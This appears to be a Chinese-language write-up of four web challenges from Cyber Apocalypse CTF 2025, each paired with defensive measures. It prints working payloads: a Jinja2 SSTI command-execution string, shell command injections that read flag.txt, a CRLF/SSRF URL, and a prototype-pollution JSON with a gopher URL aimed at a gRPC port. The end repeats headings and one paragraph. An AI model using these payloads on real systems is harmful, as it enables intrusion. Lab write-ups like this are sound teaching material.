Cyber Apocalypse CTF 2025 Web题目解析与利用技术详解<\/h1>

目录<\/h2>

Trial by Fire - Jinja2 SSTI利用<\/a><\/li>
Whispers of the Moonbeam - 命令注入与终端绕过<\/a><\/li>
Cyber Attack - Apache CRLF注入与SSRF<\/a><\/li>

Eldoria Realms - Ruby原型链污染与GRPC注入<\/a><\/li> <\/ol>

Trial by Fire<\/h2>

漏洞分析<\/h3>

这是一个基于Jinja2模板引擎的服务器端模板注入(SSTI)漏洞。<\/p>

题目提供了一个简单的路由，使用Jinja2模板引擎渲染用户输入<\/li>

由于未对用户输入进行适当过滤，导致可以直接注入模板代码<\/li> <\/ul>

利用方法<\/h3>

直接构造Jinja2的SSTI payload进行利用：<\/p>

{{ config.<\/span>__class__.<\/span>__init__.<\/span>__globals__['os'<\/span>].<\/span>popen('id'<\/span>).<\/span>read() }}
<\/span><\/span><\/code><\/pre>防御措施<\/h3>

对用户输入进行严格过滤<\/li>
使用Jinja2的沙盒环境<\/li>
避免直接将用户输入作为模板渲染<\/li>
<\/ul>
Whispers of the Moonbeam<\/h2>
非预期解<\/h3>
题目提供了一个类似终端的界面，包含以下命令：<\/p>

gossip<\/code> - 查看系统信息<\/li>
observe<\/code> - 查看进程信息<\/li>
<\/ul>
直接利用gossip<\/code>命令查看目录，发现flag.txt<\/code>文件并直接访问：<\/p>
http:\/\/target\/flag.txt
<\/code><\/pre>
预期解（命令注入）<\/h3>

通过observe<\/code>命令可以发现系统执行了Linux命令<\/li>
在命令输入框中使用分号(;<\/code>)进行命令注入：<\/li>
<\/ol>
; cat flag.txt;
<\/code><\/pre>
或者：<\/p>
| cat flag.txt
<\/code><\/pre>
防御措施<\/h3>

使用白名单验证用户输入<\/li>
避免直接拼接用户输入到系统命令<\/li>
使用安全的命令执行API<\/li>
<\/ul>
Cyber Attack<\/h2>
漏洞分析<\/h3>
题目涉及Apache服务器的CRLF注入和SSRF攻击：<\/p>


提供两个攻击按钮：<\/p>

attack-domain.py<\/code> - 检查域名格式<\/li>
attack-ip<\/code> - 检查IP格式并限制为本地访问<\/li>
<\/ul>
<\/li>

Apache配置限制：<\/p>

只有本地用户可以调用attack-ip<\/code>路由<\/li>
index.php<\/code>中也做了相应限制<\/li>
<\/ul>
<\/li>
<\/ol>
利用方法<\/h3>
利用Apache的CRLF注入完成SSRF攻击：<\/p>

构造恶意payload利用CRLF注入：<\/li>
<\/ol>
http:\/\/target\/attack-domain?url=http:\/\/127.0.0.1%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0a%0d%0a
<\/code><\/pre>

绕过本地限制，访问attack-ip<\/code>路由<\/li>
<\/ol>
防御措施<\/h3>

严格验证HTTP头<\/li>
禁用不必要的HTTP方法<\/li>
限制服务器对自身的请求<\/li>
<\/ul>
Eldoria Realms<\/h2>
漏洞概述<\/h3>
这是一个Ruby应用，涉及原型链污染和GRPC注入攻击，最终实现RCE。<\/p>
污染our_url<\/h3>


应用路由：<\/p>

\/player<\/code> - 用户信息，包含merge<\/code>方法更新信息<\/li>
\/quest<\/code> - 问题及其奖金<\/li>
\/store<\/code> - 商店<\/li>
\/fellowship<\/code> - 用户信息<\/li>
\/livedata<\/code> - 更新信息<\/li>
\/advanced<\/code> - 召唤Helios和连接realm功能<\/li>
<\/ul>
<\/li>

漏洞点：<\/p>

merge_with<\/code>调用了recursive_merge<\/code>方法<\/li>
从merge-fates<\/code>路由获取用户输入的JSON数据<\/li>
可以污染our_url<\/code>属性来更改连接行为<\/li>
<\/ul>
<\/li>
<\/ol>
利用SSRF请求走私GRPC packet<\/h3>

污染our_url<\/code>后，通过connect-realm<\/code>路由执行curl命令<\/li>
Docker环境中curl版本为7.7.0.0，可利用gopher协议攻击GRPC<\/li>
目标端口：127.0.0.1:50051<\/li>
<\/ol>
go命令注入<\/h3>
在app.go<\/code>中存在不安全的命令拼接：<\/p>
cmd<\/span> :=<\/span> exec<\/span>.Command<\/span>("sh"<\/span>, "-c"<\/span>, "nc -zv "<\/span>+<\/span>ip<\/span>+<\/span>" "<\/span>+<\/span>port<\/span>)
<\/span><\/span><\/code><\/pre>可以直接注入命令：<\/p>
port<\/span> = "1337; cat \/flag.txt;"<\/span>
<\/span><\/span><\/code><\/pre>完整利用步骤<\/h3>

污染our_url<\/code>：<\/li>
<\/ol>
{
<\/span><\/span>  "__proto__"<\/span>: {
<\/span><\/span>    "our_url"<\/span>: "gopher:\/\/127.0.0.1:50051\/_<GRPC_PACKET>"<\/span>
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
调用connect<\/code>触发漏洞<\/li>
访问\/flag.txt<\/code>获取flag<\/li>
<\/ol>
防御措施<\/h3>

避免使用__proto__<\/code>等原型链操作<\/li>
严格验证用户输入的URL<\/li>
使用安全的命令执行方式<\/li>
更新curl等基础组件<\/li>
<\/ul>
总结<\/h2>
本次CTF题目涵盖了多种Web安全技术：<\/p>

模板注入(SSTI)<\/li>
命令注入<\/li>
CRLF注入<\/li>
SSRF攻击<\/li>
原型链污染<\/li>
GRPC协议注入<\/li>
<\/ol>
每种技术都需要深入理解其原理和防御方法，在实际开发中应特别注意这些安全风险。<\/p>

Cyber Apocalypse CTF 2025 Web题目解析与利用技术详解<\/h1>

Trial by Fire<\/h2>

Whispers of the Moonbeam<\/h2>

Cyber Attack<\/h2>

Eldoria Realms<\/h2>

漏洞概述<\/h3> 这是一个Ruby应用，涉及原型链污染和GRPC注入攻击，最终实现RCE。<\/p>

漏洞概述<\/h3>
这是一个Ruby应用，涉及原型链污染和GRPC注入攻击，最终实现RCE。<\/p>